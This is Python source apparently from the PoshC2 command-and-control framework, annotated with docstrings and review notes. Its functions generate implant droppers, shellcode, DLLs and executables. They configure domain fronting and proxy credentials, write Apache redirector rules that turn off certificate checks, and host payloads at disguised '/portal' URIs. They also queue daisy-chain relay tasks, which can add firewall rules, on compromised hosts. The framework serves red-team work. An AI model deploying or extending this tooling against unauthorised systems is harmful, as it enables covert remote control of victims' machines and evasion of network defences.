def do_createnewpayload(user, command, creds=None, shellcodeOnly=False):
    """Interactively build a new proxy-aware payload set from the CLI.

    Prompts the operator for a name, comms URLs, domain-front headers, an
    optional proxy and the PBind values, records the URL details with
    new_urldetails() and then generates the payload files through Payloads.

    Args:
        user: the operator issuing the command; passed to
            get_creds_from_params() when "-credid" is given.
        command: the raw CLI line; the leading "createnewpayload " is stripped
            case-insensitively.
        creds: NOTE(review): this argument is discarded (overwritten with
            None below); credentials are only picked up from "-credid".
        shellcodeOnly: when true only droppers and shellcode are produced,
            otherwise Payloads.CreateAll() runs.

    Returns:
        None in every path; failures are reported via print_bad() and the
        function returns early.
    """
    params = re.compile("createnewpayload ", re.IGNORECASE)
    params = params.sub("", command)
    # The creds parameter is unconditionally replaced here.
    creds = None
    if "-credid" in params:
        creds, params = get_creds_from_params(params, user)
        if creds is None:
            return
        if not creds['Password']:
            # Hash-only credential records cannot serve as a proxy password.
            print_bad("This command does not support credentials with hashes")
            input("Press Enter to continue...")
            clear()
            return
    name = input(Colours.GREEN + "Proxy Payload Name: e.g. Scenario_One ")
    comms_url = input("Domain or URL in array format: https://www.example.com,https://www.example2.com ")
    domainfront = input("Domain front URL in array format: fjdsklfjdskl.cloudfront.net,jobs.azureedge.net ")
    proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
    pbindsecret = input(f"PBind Secret: e.g {PBindSecret} ")
    pbindpipename = input(f"PBind Pipe Name: e.g. {PBindPipeName} ")
    # string_to_array() returns the array-formatted string plus its element count.
    comms_url, PayloadCommsHostCount = string_to_array(comms_url)
    domainfront, DomainFrontHeaderCount = string_to_array(domainfront)
    if PayloadCommsHostCount == DomainFrontHeaderCount:
        pass
    else:
        # NOTE(review): the mismatch is only reported; there is no return, so
        # execution continues and the mismatched lists are still recorded.
        print("[-] Error - different number of host headers and URLs")
        input("Press Enter to continue...")
        clear()
    proxyuser = ""
    proxypass = ""
    credsexpire = ""
    if proxyurl:
        if creds is not None:
            # NOTE(review): "******" has no %-conversion specifier, so the %
            # operator with a two-tuple raises TypeError here. This reads
            # like a redacted format string -- confirm the intended form
            # (the prompt below suggests Domain\user) against upstream.
            proxyuser = "******" % (creds['Domain'], creds['Username'])
            proxypass = creds['Password']
        else:
            proxyuser = input(Colours.GREEN + "Proxy User: e.g. Domain\\user ")
            proxypass = input("Proxy Password: e.g. Password1 ")
            credsexpire = input(Colours.GREEN + "Password/Account Expiration Date: .e.g. 15/03/2018 ")
        # "?p" is appended to the implant URL only when a proxy URL was given
        # (compare the "?d" suffix used by the daisy functions in this file).
        imurl = "%s?p" % get_newimplanturl()
    else:
        imurl = get_newimplanturl()
    C2 = get_c2server_all()
    # Proxy user/password are handed to new_urldetails() together with the
    # URL details; how they are stored is outside this file.
    urlId = new_urldetails(name, comms_url, domainfront, proxyurl, proxyuser, proxypass, credsexpire)
    newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, imurl, PayloadsDirectory, URLID=urlId, PBindPipeName=pbindpipename, PBindSecret=pbindsecret)
    # Output files are prefixed with "<name>_".
    if shellcodeOnly:
        newPayload.CreateDroppers("%s_" % name)
        newPayload.CreateShellcode("%s_" % name)
    else:
        newPayload.CreateAll("%s_" % name)
    print_good("Created new payloads")
    input("Press Enter to continue...")
    clear()
def do_createdaisypayload(user, command):
    """Interactively build a payload set that talks to an existing daisy host.

    Prompts for a name, the daisy URL and the implant id acting as the daisy
    host, records a URL entry with new_urldetails() and generates the
    individual payload formats.

    Args:
        user: unused within this function.
        command: unused within this function.

    Returns:
        None.
    """
    name = input(Colours.GREEN + "Daisy Payload Name: e.g. DC1 ")
    default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
    daisyurl = input(f"Daisy URL: e.g. {default_url} ")
    # 127.0.0.1 is rewritten to "localhost" in both http and https forms.
    if ("http://127.0.0.1" in daisyurl):
        daisyurl = daisyurl.replace("http://127.0.0.1", "http://localhost")
    if ("https://127.0.0.1" in daisyurl):
        daisyurl = daisyurl.replace("https://127.0.0.1", "https://localhost")
    daisyhostid = input("Select Daisy Implant Host: e.g. 5 ")
    daisyhost = get_implantbyid(daisyhostid)
    # PowerShell snippet that clears the web-client proxy when no proxy URL is set.
    proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
    pbindsecret = PBindSecret
    pbindpipename = PBindPipeName
    # NOTE(review): daisyurl_count is never read.
    daisyurl, daisyurl_count = string_to_array(daisyurl)
    daisyhostheader = ""
    c = 0
    daisyurls = daisyurl.split(",")
    # NOTE(review): this loop builds a comma-separated list of empty quoted
    # strings in daisyhostheader, but the result is never used below.
    for url in daisyurls:
        if c > 0:
            daisyhostheader += ",\"\""
        else:
            daisyhostheader += "\"\""
        c += 1
    C2 = get_c2server_all()
    urlId = new_urldetails(name, C2.PayloadCommsHost, C2.DomainFrontHeader, "", "", "", "")
    newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, "%s?d" % get_newimplanturl(), PayloadsDirectory, PowerShellProxyCommand=proxynone, URLID=urlId, PBindPipeName=pbindpipename, PBindSecret=pbindsecret)
    # Rewrite the "$pid;<url>" marker in the PowerShell dropper to carry the
    # daisy host's user@domain instead; the replace is a no-op if the marker
    # text does not match exactly.
    newPayload.PSDropper = (newPayload.PSDropper).replace(
        "$pid;%s" % (daisyurl), "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
    # Output files are prefixed with "<name>_".
    newPayload.CreateDroppers("%s_" % name)
    newPayload.CreateShellcode("%s_" % name)
    newPayload.CreateRaw("%s_" % name)
    newPayload.CreateDlls("%s_" % name)
    newPayload.CreateEXE("%s_" % name)
    newPayload.CreateMsbuild("%s_" % name)
    newPayload.CreateDonutShellcode("%s_" % name)
    print_good("Created new %s daisy payloads" % name)
    input("Press Enter to continue...")
    clear()
def newdb(db):
    """Initialise a fresh project directory, database and default payload set.

    Creates the project sub-directories, initialises the database, validates
    DefaultSleep, stores the server configuration, writes an Apache
    rewrite-rules file, generates the default payloads and quickstart, and
    registers the default hosted files.

    Args:
        db: an object whose .value is used only in the banner message.

    Raises:
        SystemExit: via sys.exit(1) when DefaultSleep fails validate_sleep_time().
    """
    print("Initializing new project folder and %s database" % db.value + Colours.GREEN)
    print("")
    # NOTE(review): presumably PoshProjectDirectory ends with a separator, so
    # dirname() yields the project directory itself without the trailing
    # slash -- confirm; the rest of the file formats it as "%spayloads".
    directory = os.path.dirname(PoshProjectDirectory)
    if not os.path.exists(directory):
        os.makedirs(directory)
    if not os.path.exists("%s/downloads" % directory):
        os.makedirs("%s/downloads" % directory)
    if not os.path.exists("%s/reports" % directory):
        os.makedirs("%s/reports" % directory)
    if not os.path.exists("%s/payloads" % directory):
        os.makedirs("%s/payloads" % directory)
    initializedb()
    if not validate_sleep_time(DefaultSleep):
        print(Colours.RED)
        print("Invalid DefaultSleep in config, please specify a time such as 50s, 10m or 1h")
        print(Colours.GREEN)
        sys.exit(1)
    # A fresh encryption key is generated for this project; the three empty
    # strings fill positional parameters whose meaning is not visible here.
    setupserver(PayloadCommsHost, gen_key().decode("utf-8"), DomainFrontHeader, DefaultSleep, KillDate, GET_404_Response, PoshProjectDirectory, QuickCommand, DownloadURI, "", "", "", URLS, SocksURLS, Insecure, UserAgent, Referrer, Pushover_APIToken, Pushover_APIUser, Slack_UserID, Slack_Channel, Slack_BotToken, EnableNotifications)
    rewriteFile = "%s/rewrite-rules.txt" % directory
    print("Creating Rewrite Rules in: " + rewriteFile)
    # Apache header for the redirector config. The SSLProxy* lines turn off
    # certificate verification of the proxied backend; the Define lines are
    # placeholder IPs the operator is expected to edit.
    rewriteHeader = ["RewriteEngine On", "SSLProxyEngine On", "SSLProxyCheckPeerCN Off", "SSLProxyVerify none", "SSLProxyCheckPeerName off", "SSLProxyCheckPeerExpire off", "# Change IPs to point at C2 infrastructure below", "Define PoshC2 10.0.0.1", "Define SharpSocks 10.0.0.1", "# If running Apache 2.4.52 or Later", "Proxy100Continue Off"]
    rewriteFileContents = rewriteHeader + urlConfig.fetchRewriteRules() + urlConfig.fetchSocksRewriteRules()
    with open(rewriteFile, 'w') as outFile:
        for line in rewriteFileContents:
            outFile.write(line)
            outFile.write('\n')
        # NOTE(review): redundant -- the with-block already closes the file.
        outFile.close()
    C2 = get_c2server_all()
    urlId = new_urldetails("default", C2.PayloadCommsHost, C2.DomainFrontHeader, "", "", "", "")
    newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, get_newimplanturl(), PayloadsDirectory, URLID=urlId)
    newPayload.CreateAll()
    create_self_signed_cert(PoshProjectDirectory)
    # NOTE(review): existingdb() writes the same file as
    # PoshProjectDirectory + 'quickstart.txt'; both spellings agree only if
    # PoshProjectDirectory ends with a separator.
    newPayload.WriteQuickstart(directory + '/quickstart.txt')
    # adding default hosted payloads
    # Each entry maps a URI under QuickCommand to a file in PayloadsDirectory;
    # the trailing "Yes"/"No" flags are passed through to insert_hosted_file()
    # and their meaning is not visible in this file.
    QuickCommandURI = select_item("QuickCommand", "C2Server")
    insert_hosted_file("%ss/86/portal" % QuickCommandURI, "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory), "text/html", "Yes", "Yes")
    insert_hosted_file("%ss/64/portal" % QuickCommandURI, "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory), "text/html", "Yes", "Yes")
    insert_hosted_file("%sp/86/portal" % QuickCommandURI, "%sPosh_v4_x86_Shellcode.bin" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
    insert_hosted_file("%sp/64/portal" % QuickCommandURI, "%sPosh_v4_x64_Shellcode.bin" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
    insert_hosted_file("%s_ex86" % QuickCommandURI, "%sPosh_v4_dropper_x86.exe" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
    insert_hosted_file("%s_ex64" % QuickCommandURI, "%sPosh_v4_dropper_x64.exe" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
    insert_hosted_file("%s_bs" % QuickCommandURI, "%spayload.bat" % (PayloadsDirectory), "text/html", "No", "Yes")
    insert_hosted_file("%s_rp" % QuickCommandURI, "%spayload.txt" % (PayloadsDirectory), "text/html", "Yes", "Yes")
    insert_hosted_file("%s_rg" % QuickCommandURI, "%srg_sct.xml" % (PayloadsDirectory), "text/html", "No", "Yes")
    insert_hosted_file("%s_cs" % QuickCommandURI, "%scs_sct.xml" % (PayloadsDirectory), "text/html", "No", "Yes")
    insert_hosted_file("%s_py" % QuickCommandURI, "%saes.py" % (PayloadsDirectory), "text/html", "No", "Yes")
def existingdb(db):
    """Open an existing project and regenerate payloads if the host config changed.

    When the stored PayloadCommsHost and DomainFrontHeader match the current
    configuration the saved quickstart is printed. Otherwise the payloads
    directory is rotated to payloads_old, the server record is updated, a new
    URL entry is created and the full payload set plus hosted files are
    regenerated.

    Args:
        db: an object whose .value is used only in the banner message.

    Returns:
        None.
    """
    print("Using existing %s database / project" % db.value + Colours.GREEN)
    database_connect()
    C2 = get_c2server_all()
    if ((C2.PayloadCommsHost == PayloadCommsHost) and (C2.DomainFrontHeader == DomainFrontHeader)):
        qstart = "%squickstart.txt" % (PoshProjectDirectory)
        if os.path.exists(qstart):
            with open(qstart, 'r') as f:
                print(f.read())
    else:
        # Either the comms host or the domain-front header differs from the
        # stored record, so the payload set is rebuilt.
        print("Error different IP so regenerating payloads")
        if os.path.exists("%spayloads_old" % PoshProjectDirectory):
            # Function-scope import; only needed on this path.
            import shutil
            # Only one previous generation is kept.
            shutil.rmtree("%spayloads_old" % PoshProjectDirectory)
        os.rename("%spayloads" % PoshProjectDirectory, "%spayloads_old" % PoshProjectDirectory)
        os.makedirs("%spayloads" % PoshProjectDirectory)
        update_item("PayloadCommsHost", "C2Server", PayloadCommsHost)
        update_item("QuickCommand", "C2Server", QuickCommand)
        update_item("DomainFrontHeader", "C2Server", DomainFrontHeader)
        # Re-read so C2.DomainFrontHeader reflects the update above.
        C2 = get_c2server_all()
        # URL entry named with a UTC timestamp (datetime/timezone must be in
        # scope at file level; their import is not visible here).
        urlId = new_urldetails(f"updated_host-{datetime.strftime(datetime.now(timezone.utc), '%Y-%m-%d-%H:%M:%S')}", PayloadCommsHost, C2.DomainFrontHeader, "", "", "", "")
        newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, get_newimplanturl(), PayloadsDirectory, URLID=urlId)
        newPayload.CreateAll()
        newPayload.WriteQuickstart(PoshProjectDirectory + 'quickstart.txt')
        # adding default hosted payloads
        # Same hosted-file table as newdb(); the "Yes"/"No" flags are passed
        # through to insert_hosted_file() and are not interpreted here.
        QuickCommandURI = select_item("QuickCommand", "C2Server")
        insert_hosted_file("%ss/86/portal" % QuickCommandURI, "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory), "text/html", "Yes", "Yes")
        insert_hosted_file("%ss/64/portal" % QuickCommandURI, "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory), "text/html", "Yes", "Yes")
        insert_hosted_file("%sp/86/portal" % QuickCommandURI, "%sPosh_v4_x86_Shellcode.bin" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
        insert_hosted_file("%sp/64/portal" % QuickCommandURI, "%sPosh_v4_x64_Shellcode.bin" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
        insert_hosted_file("%s_ex86" % QuickCommandURI, "%sPosh_v4_dropper_x86.exe" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
        insert_hosted_file("%s_ex64" % QuickCommandURI, "%sPosh_v4_dropper_x64.exe" % (PayloadsDirectory), "application/x-msdownload", "No", "Yes")
        insert_hosted_file("%s_bs" % QuickCommandURI, "%spayload.bat" % (PayloadsDirectory), "text/html", "No", "Yes")
        insert_hosted_file("%s_rp" % QuickCommandURI, "%spayload.txt" % (PayloadsDirectory), "text/html", "Yes", "Yes")
        insert_hosted_file("%s_rg" % QuickCommandURI, "%srg_sct.xml" % (PayloadsDirectory), "text/html", "No", "Yes")
        insert_hosted_file("%s_cs" % QuickCommandURI, "%scs_sct.xml" % (PayloadsDirectory), "text/html", "No", "Yes")
        insert_hosted_file("%s_py" % QuickCommandURI, "%saes.py" % (PayloadsDirectory), "text/html", "No", "Yes")
def do_startdaisy(user, command, randomuri):
    """Interactively queue an invoke-daisychain task and optionally build payloads.

    Collects bind address/port, upstream C2 or upstream daisy details and
    optional proxy settings, assembles the PowerShell command string, queues
    it with new_task(), labels the implant as a DaisyHost and, if requested,
    generates a payload set pointing at the new daisy listener.

    Args:
        user: the operator issuing the command.
        command: the raw CLI line; it is not read and is overwritten with the
            assembled invoke-daisychain command.
        randomuri: identifier of the implant that will host the daisy.

    Returns:
        None; returns early if the operator declines the unelevated warning.
    """
    check_module_loaded("invoke-daisychain.ps1", randomuri, user)
    elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END)
    domain_front = ""
    proxy_user = ""
    proxy_pass = ""
    proxy_url = ""
    cred_expiry = ""
    if elevated.lower() == "n":
        cont = input(
            Colours.RED + "Daisy from an unelevated context can only bind to localhost, continue? y/N " + Colours.END)
        # Default answer is "no".
        if cont.lower() == "n" or cont == "":
            return
        bind_ip = "localhost"
    else:
        # NOTE(review): any answer other than "n" reaches this prompt, but the
        # later elevated check only accepts "y"/"" -- other answers get a bind
        # IP prompt here and "-localhost" appended below.
        bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " + Colours.END)
    bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " + Colours.END)
    firstdaisy = input(Colours.GREEN + "Is this the first daisy in the chain? Y/n? " + Colours.END)
    default_url = get_first_url(PayloadCommsHost, DomainFrontHeader)
    default_df_header = get_first_dfheader(DomainFrontHeader)
    # A domain-front header equal to the URL itself is treated as "none".
    if default_df_header == default_url:
        default_df_header = None
    if firstdaisy.lower() == "y" or firstdaisy == "":
        # First hop: talks straight to the C2, so proxy settings are relevant.
        upstream_url = input(Colours.GREEN + f"C2 URL (leave blank for {default_url}): " + Colours.END)
        domain_front = input(
            Colours.GREEN + f"Domain front header (leave blank for {str(default_df_header)}): " + Colours.END)
        proxy_user = input(
            Colours.GREEN + "Proxy user (<domain>\\<username>, leave blank if none): " + Colours.END)
        proxy_pass = input(Colours.GREEN + "Proxy password (leave blank if none): " + Colours.END)
        proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " + Colours.END)
        # NOTE(review): unlike the sibling prompts this one omits Colours.END.
        cred_expiry = input(
            Colours.GREEN + "Password/Account Expiration Date: .e.g. 15/03/2018: ")
        if not upstream_url:
            upstream_url = default_url
        if not domain_front:
            if default_df_header:
                domain_front = default_df_header
            else:
                domain_front = ""
    else:
        # Subsequent hop: upstream is another daisy listener over plain http.
        upstream_daisy_host = input(Colours.GREEN + "Upstream daisy server: " + Colours.END)
        upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port: " + Colours.END)
        upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}"
    # Build the PowerShell command. Operator input is embedded inside single
    # quotes without escaping, so a quote character in any value would break
    # the resulting command line.
    command = f"invoke-daisychain -daisyserver http://{bind_ip} -port {bind_port} -c2server {upstream_url}"
    if domain_front:
        command = command + f" -domfront {domain_front}"
    if proxy_url:
        command = command + f" -proxyurl '{proxy_url}'"
    if proxy_user:
        command = command + f" -proxyuser '{proxy_user}'"
    if proxy_pass:
        command = command + f" -proxypassword '{proxy_pass}'"
    if elevated.lower() == "y" or elevated == "":
        # Default answer is "no firewall rule".
        firewall = input(Colours.GREEN + "Add firewall rule? (uses netsh.exe) y/N: ")
        if firewall.lower() == "n" or firewall == "":
            command = command + " -nofwrule"
    else:
        print_good(
            "Not elevated so binding to localhost and not adding firewall rule"
        )
        command = command + " -localhost"
    urls = get_allurls()
    command = command + f" -urls '{urls}'"
    new_task(command, user, randomuri)
    update_label("DaisyHost", randomuri)
    createpayloads = input(
        Colours.GREEN + "Would you like to create payloads for this Daisy Server? Y/n ")
    if createpayloads.lower() == "y" or createpayloads == "":
        name = input(Colours.GREEN + "Enter a payload name: " + Colours.END)
        daisyhost = get_implantdetails(randomuri)
        # PowerShell snippet that clears the web-client proxy when no proxy URL is set.
        proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
        C2 = get_c2server_all()
        # The comms host is stored as a quoted http URL for the new listener;
        # proxy credentials and expiry are passed through to new_urldetails().
        urlId = new_urldetails(name, f"\"http://{bind_ip}:{bind_port}\"", "\"\"", proxy_url, proxy_user, proxy_pass, cred_expiry)
        newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, "%s?d" % get_newimplanturl(), PayloadsDirectory, URLID=urlId, PowerShellProxyCommand=proxynone)
        # Rewrite the "$pid;<url>" marker in the PowerShell dropper to the
        # daisy host's user@domain; a no-op if the marker text does not match.
        newPayload.PSDropper = (newPayload.PSDropper).replace(
            "$pid;%s" % (upstream_url), "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain))
        # NOTE(review): unlike do_createdaisypayload(), the name is used here
        # without a trailing "_" prefix separator.
        newPayload.CreateDroppers(name)
        newPayload.CreateRaw(name)
        newPayload.CreateDlls(name)
        newPayload.CreateShellcode(name)
        newPayload.CreateEXE(name)
        newPayload.CreateMsbuild(name)
        print_good("Created new %s daisy payloads" % name)